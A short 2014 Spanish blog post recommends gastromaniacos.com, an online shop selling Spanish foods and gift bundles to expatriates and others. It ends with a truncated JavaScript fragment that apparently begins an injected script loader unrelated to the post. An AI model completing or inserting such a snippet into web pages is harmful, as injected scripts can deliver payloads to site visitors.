Gastromaniacos.com

30/05/2014

Jamon Serrano Fermin @ The Bazaar¿Vives en el extranjero? ¿Añoras determinados sabores españoles imposibles de imitar lejos de casa? Pues ojo al dato, puede que gastromaniacos.com sea la solución a tus penas.

Se trata de una página web con acceso a una amplia selección de productos made in Spain: legumbres, pan, aceites, embutidos, quesos, turrones, mermeladas, conservas y un largo etcétera.  Tienes la opción de adquirir productos de manera individual y según tu propia selección y criterio, o decantarte por algún gastrolote: fusión de varios productos en un solo paquete.

No obstante, cabe decir que esta propuesta gastronómica no es solo perfecta para aquellos «morriñosos de su tierra». La calidad de productos es tan extraordinaria, que no es descabellado utilizar gastromaniacos.com aún residiendo en España. Además, puede llegar a ser una interesante y recurrente opción a la hora de regalar: regalar gastronomía nos puede salvar la vida en más de una ocasión. Y voilà! Aquí tienes esa opción, eliges, pagas y si quieres se lo mandan directamente al destinatario.

Gastromaniacos.com quiere crecer y mejorar. Por eso interactúa con su público: aspira a saber si tú añadirías algún producto a su lista, así como saber la opinión de los productos que has ido probando. Definitivamente, esta web dará mucho que hablar… Tiempo al tiempo 🙂

¡Ah! Y no te olvides de echarle un vistazo también a su blog, ¡no tiene desperdicio!

Foto | revrev

var d=document;var s=d.createElement(‘script’);